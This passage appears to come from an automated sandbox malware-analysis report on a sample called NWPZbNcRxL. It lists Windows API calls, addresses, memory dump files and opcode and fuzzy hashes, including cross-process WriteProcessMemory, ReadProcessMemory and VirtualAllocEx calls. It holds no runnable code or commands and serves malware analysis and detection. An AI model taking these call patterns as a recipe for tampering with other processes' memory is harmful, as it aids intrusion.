                                                                                                                            • IsWindow.USER32(00000000), ref: 00C85A6E
                                                                                                                            • GetForegroundWindow.USER32 ref: 00C85A85
                                                                                                                            • GetDC.USER32(00000000), ref: 00C85AC1
                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C85ACD
                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C85B08
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4156661090-0
                                                                                                                            • Opcode ID: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
                                                                                                                            • Instruction ID: 8769df7d1f6af3cc4d316e7a5416504a0a020480da6ea21affae476676d09eab
                                                                                                                            • Opcode Fuzzy Hash: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
                                                                                                                            • Instruction Fuzzy Hash: 45216235A00204AFD714EF65D888BAEB7E5EF49350F14C479F949D7351CA70AD41EB90
                                                                                                                            APIs
                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C1134D
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00C1135C
                                                                                                                            • BeginPath.GDI32(?), ref: 00C11373
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00C1139C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3225163088-0
                                                                                                                            • Opcode ID: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
                                                                                                                            • Instruction ID: 19bbf47f5596d48529563adf164d3af038f08d5d7c973c54f62916736fd97a66
                                                                                                                            • Opcode Fuzzy Hash: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
                                                                                                                            • Instruction Fuzzy Hash: C2215C70841608EFDB109F25EC087AD7BE8FB01322F58422BF920961F4D37499A1EF90
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C74ABA
                                                                                                                            • __beginthreadex.LIBCMT ref: 00C74AD8
                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C74AED
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C74B03
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C74B0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3824534824-0
                                                                                                                            • Opcode ID: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
                                                                                                                            • Instruction ID: e608805df7655b57b16cd8f470699d5ddb12c96fbb02705e147f44994fbda671
                                                                                                                            • Opcode Fuzzy Hash: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
                                                                                                                            • Instruction Fuzzy Hash: EA110876D05619BBC7058FB89C08BAF7FACEB45320F14826AF828D3260D771CD0487A0
                                                                                                                            APIs
                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
                                                                                                                            • GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 842720411-0
                                                                                                                            • Opcode ID: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
                                                                                                                            • Instruction ID: 800b0a355eacd8c0f441df2909cba28dcda03313fc58f0478d68c6ace4c96bcd
                                                                                                                            • Opcode Fuzzy Hash: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
                                                                                                                            • Instruction Fuzzy Hash: BE016DB1204204BFDB204FA5DC8CE6F7BACEF8A755B50052EF859C2260DA318D45CA60
                                                                                                                            APIs
                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C6716C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3897988419-0
                                                                                                                            • Opcode ID: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
                                                                                                                            • Instruction ID: 39ef8285ac6d47b8c720aa7ec1316df1712aea4b3411f298a86bd165c4cae252
                                                                                                                            • Opcode Fuzzy Hash: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
                                                                                                                            • Instruction Fuzzy Hash: 1001D472600204BBDB204F24DC88BAE7BBCEF46795F10066AFD08D2220D7B1DD4187A0
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75260
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C7526E
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75276
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C75280
                                                                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2833360925-0
                                                                                                                            • Opcode ID: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
                                                                                                                            • Instruction ID: b17547bfab1dc0b7e32323aaf3553dd811c5473d6f37664d8205adafca7e9fbb
                                                                                                                            • Opcode Fuzzy Hash: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
                                                                                                                            • Instruction Fuzzy Hash: D5015731D01A19DBCF00EFE5E84CBEDBB78BB08711F40415AE949F2256DBB09A5187A5
                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 44706859-0
                                                                                                                            • Opcode ID: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
                                                                                                                            • Instruction ID: 39ebc1db735d5a4850d94c5d4b55725f16b3aee9c9f7044b71bed05a5091f34e
                                                                                                                            • Opcode Fuzzy Hash: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
                                                                                                                            • Instruction Fuzzy Hash: 98F04F71200304AFEB210FA5ECDDF6F3BACFF4AB58B10012AF985C6160CA619946DA60
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C6C1F7
                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C6C20E
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C6C226
                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00C6C242
                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00C6C25C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3741023627-0
                                                                                                                            • Opcode ID: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
                                                                                                                            • Instruction ID: 85e99c77674819bfd20d5f7d169f5ae02e70507a9979d91be429b70d58fd9968
                                                                                                                            • Opcode Fuzzy Hash: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
                                                                                                                            • Instruction Fuzzy Hash: 9901A77050470497EB305B61DD9EBAA7778BF00705F04026EB992D14E1D7E469559B90
                                                                                                                            APIs
                                                                                                                            • EndPath.GDI32(?), ref: 00C113BF
                                                                                                                            • StrokeAndFillPath.GDI32(?,?,00C4B888,00000000,?), ref: 00C113DB
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00C113EE
                                                                                                                            • DeleteObject.GDI32 ref: 00C11401
                                                                                                                            • StrokePath.GDI32(?), ref: 00C1141C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2625713937-0
                                                                                                                            • Opcode ID: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
                                                                                                                            • Instruction ID: 358c58460538d1279692b6c0a89a154251876332e8ef633c0d63298cfa95d2cf
                                                                                                                            • Opcode Fuzzy Hash: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
                                                                                                                            • Instruction Fuzzy Hash: 8DF0EC30045B08EBDB115F26EC4C79C3FA8A702726F1C822AE969890F1C73559A6FF50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                                                                              • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C17A51: _memmove.LIBCMT ref: 00C17AAB
                                                                                                                            • __swprintf.LIBCMT ref: 00C22ECD
                                                                                                                            Strings
                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C22D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                            • API String ID: 1943609520-557222456
                                                                                                                            • Opcode ID: af0cba9d831351e692e6960f85d4e863173ab179b783504512a8bb07705065f5
                                                                                                                            • Instruction ID: 21963efd848ed2200b41f9a9ecf3ce592df37911556f87fb23e05457814377e8
                                                                                                                            • Opcode Fuzzy Hash: af0cba9d831351e692e6960f85d4e863173ab179b783504512a8bb07705065f5
                                                                                                                            • Instruction Fuzzy Hash: 35919375108311AFC714EF24D895CAF77B8EF86311F00491DF8959B2A1DA30EE88EB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C7B9BB
                                                                                                                            • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7B9D4
                                                                                                                            • CoUninitialize.OLE32 ref: 00C7B9F1
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 2126378814-24824748
                                                                                                                            • Opcode ID: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
                                                                                                                            • Instruction ID: 62f050121d80f066d8edd896cc5a3481efecf59380399544aa0625c23f42a355
                                                                                                                            • Opcode Fuzzy Hash: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
                                                                                                                            • Instruction Fuzzy Hash: 3AA16A756043059FC700EF14C894E5AB7E5FF8A314F148998F8A99B3A1CB31ED86DB91
                                                                                                                            APIs
                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00C350AD
                                                                                                                              • Part of subcall function 00C400F0: __87except.LIBCMT ref: 00C4012B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorHandling__87except__start
                                                                                                                            • String ID: pow
                                                                                                                            • API String ID: 2905807303-2276729525
                                                                                                                            • Opcode ID: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
                                                                                                                            • Instruction ID: c1bd4ca839f0e6bed48aee3b8c554882165fb1678a9926cde835e1ff708c40cc
                                                                                                                            • Opcode Fuzzy Hash: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
                                                                                                                            • Instruction Fuzzy Hash: BD518C71A6C90286DB257724CD4136E3B90FB41710F308E59E5E6862E9DF758FC4AAC2
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove
                                                                                                                            • String ID: ERCP
                                                                                                                            • API String ID: 2532777613-1384759551
                                                                                                                            • Opcode ID: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
                                                                                                                            • Instruction ID: 5da9b6780dea246e3ce62b1b7fd2ed7867420ad5924f3bfe64559cb6e6e0c7ee
                                                                                                                            • Opcode Fuzzy Hash: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
                                                                                                                            • Instruction Fuzzy Hash: 1D51AEB1A00715DBDB24CFA5D885BABB7F4EF04304F20456EE85ADB691E770EA44CB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C69296,?,?,00000034,00000800,?,00000034), ref: 00C714E6
                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C6983F
                                                                                                                              • Part of subcall function 00C71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C714B1
                                                                                                                              • Part of subcall function 00C713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C71409
                                                                                                                              • Part of subcall function 00C713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C71419
                                                                                                                              • Part of subcall function 00C713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C7142F
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698AC
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
